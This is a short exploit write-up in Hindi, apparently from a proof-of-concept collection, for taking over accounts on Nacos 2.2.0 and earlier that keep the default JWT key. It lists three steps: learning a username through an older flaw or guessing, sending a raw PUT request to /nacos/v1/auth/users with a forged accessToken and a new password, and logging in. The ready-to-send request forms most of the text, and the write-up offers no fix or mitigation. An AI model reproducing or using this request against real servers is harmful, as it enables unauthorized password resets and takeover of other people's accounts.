
Alibab-Nacos-Unauthorized-Reset PWD
Nacos <= 2.2.0 को प्रभावित करने वाली एक समस्या का पता चला है। जब कोई उपयोगकर्ता डिफ़ॉल्ट JWT Key का उपयोग करता है, तो यह एक हमलावर को किसी भी उपयोगकर्ता का पासवर्ड रीसेट करने और उसके खाते पर कब्ज़ा करने की अनुमति देता है।
Nacos <= 2.2.0 संस्करण
चरण 1:उपयोगकर्ता नाम प्राप्त करें (पुरानी भेद्यता का उपयोग करें या अनुमान लगाएं)

चरण 2:पासवर्ड रीसेट करें
PUT /nacos/v1/auth/users HTTP/1.1
Host: xx.xx.xxx.xx
Content-Length: 33
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbDFleCIsImV4cCI6MTY2ODA4OTk2N30.hv0MWlHISYCgvIDQhidQBCeyYb7tbG0JrbNyx-9kDzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=
Connection: close
username=al1ex&newPassword=al22ex

चरण 3: सफलतापूर्वक लॉग इन करें
